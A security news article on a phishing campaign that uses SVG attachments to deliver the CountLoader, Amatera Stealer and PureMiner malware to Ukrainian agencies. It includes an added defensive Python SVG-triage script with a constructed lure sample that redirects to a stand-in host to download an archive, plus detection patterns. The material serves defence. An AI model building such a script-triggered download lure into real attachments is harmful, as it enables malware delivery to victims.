New phishing campaign impersonates Ukrainian government to spread malware

A new phishing campaign is targeting Ukrainian government agencies by impersonating official entities to deliver a sophisticated chain of malware. The attack begins with phishing emails that appear to be notices from the National Police of Ukraine. The emails contain malicious Scalable Vector Graphics (SVG) files, which serve as the initial trigger for the infection chain.

When opened, the SVG files download a password-protected ZIP archive containing a Compiled HTML Help (CHM) file. Once launched, the CHM file sets off a sequence of events that results in the installation of CountLoader, a malware loader that acts as a dropper for additional threats. In this instance, CountLoader is used to deploy Amatera Stealer and PureMiner.
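The chain above starts with an SVG attachment, which is an XML document that browsers will render and that may carry script or links to external resources. The following is an added defensive example, not code from the article or from any of the malware authors named: a small mail-gateway style triage check that flags SVG attachments containing script elements, event-handler attributes, embedded HTML or hrefs pointing at external URLs. The two sample SVGs are constructed for the example and are not artifacts from the campaign.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample attachments (not from the campaign). The second one carries
# the features an SVG lure needs to start a download: a link to an external
# archive and an inline script that redirects to it.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
<circle cx="5" cy="5" r="4" fill="blue"/></svg>"""

SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink">
<a xlink:href="http://example.invalid/notice.zip"><text x="0" y="15">Open notice</text></a>
<script>window.location="http://example.invalid/notice.zip";</script>
</svg>"""

# Attribute names that execute script when the SVG is rendered in a browser.
SCRIPT_EVENT_ATTRS = {"onload", "onclick", "onmouseover", "onerror", "onbegin"}

# href values that leave the document or execute code rather than point at a
# fragment inside the image.
RISKY_HREF = re.compile(r"(?i)^(https?:|data:|javascript:|file:)")


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def triage_svg(data: bytes) -> dict:
    """Return the findings that make an SVG attachment worth quarantining.

    Result: {"parse_error": bool, "findings": [str, ...], "risky": bool}.
    An unparseable SVG is treated as risky, since a renderer may still be
    lenient with it while our parser is not.
    """
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return {"parse_error": True, "findings": ["malformed XML"], "risky": True}

    for el in root.iter():
        tag = _local(el.tag).lower()
        if tag == "script":
            findings.append("script element")
        if tag == "foreignobject":
            findings.append("foreignObject element (embedded HTML)")
        for attr, value in el.attrib.items():
            a = _local(attr).lower()
            if a in SCRIPT_EVENT_ATTRS:
                findings.append(f"event handler attribute {a} on <{tag}>")
            if a == "href" and RISKY_HREF.match(value.strip()):
                findings.append(f"external or scheme href on <{tag}>: {value.strip()[:60]}")

    return {"parse_error": False, "findings": findings, "risky": bool(findings)}


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        result = triage_svg(blob)
        print(label, "->", "RISKY" if result["risky"] else "ok", result["findings"])
```

The check is deliberately coarse: a legitimate image rarely needs script, event handlers or links to remote hosts, so any hit is enough to hold the message for review rather than deliver it. Pair it with the later stages of the chain the article describes, such as blocking or detonating password-protected archives and CHM attachments at the gateway.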

Amatera Stealer, a variant of ACRStealer, is designed to harvest sensitive information from infected systems, including data from browsers, cryptocurrency wallets, and applications like Steam and Telegram. PureMiner, on the other hand, is a stealthy .NET-based cryptocurrency miner. Both threats are executed without leaving files on disk, using techniques like .NET Ahead-of-Time (AOT) compilation and memory injection to evade detection.

Both tools are part of a larger malware suite developed by a threat actor known as PureCoder, whose other creations include remote access trojans, crypters, clippers, and botnet loaders.
